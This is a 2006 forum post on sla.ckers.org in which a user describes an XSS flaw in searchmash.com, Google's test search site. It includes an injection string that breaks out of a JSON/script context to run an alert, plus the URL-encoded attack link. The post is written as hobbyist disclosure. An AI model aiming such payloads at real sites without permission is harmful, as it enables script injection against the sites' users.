Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
For the searchmash spider
Posted by: maluc
Date: October 06, 2006 08:00PM

Well there's an XSS hole in http://www.searchmash.com.. googles new improved searching test, i guess. There's still not too much info on it. Anyways, there is a hole but only if the search engine finds atleast one webpage to show. Thus i'm waiting for their spider to index this: asdf"},results:[]});alert(String.fromCharCode(88,83,83));_init({query:{//
..hopefully it'll index it properly despite all the odd characters.

This gets translated into: asdf\"},results:[]});alert(String.fromCharCode(88,83,83));_init({query:{//

So yea, nothing to see here ^^ for now. Except that it makes for an interesting example, of needing the website to help you out to XSS themself.

When it does get indexed the link should be: http://www.searchmash.com/search/asdf%22%7D%2Cresults:%5B%5D%7D)%3Balert(String.fromCharCode(88%2C83%2C83))%3B_init(%7Bquery:%7B%2F%2F .. hope it works.

-maluc

Options: ReplyQuote


Sorry, only registered users may post in this forum.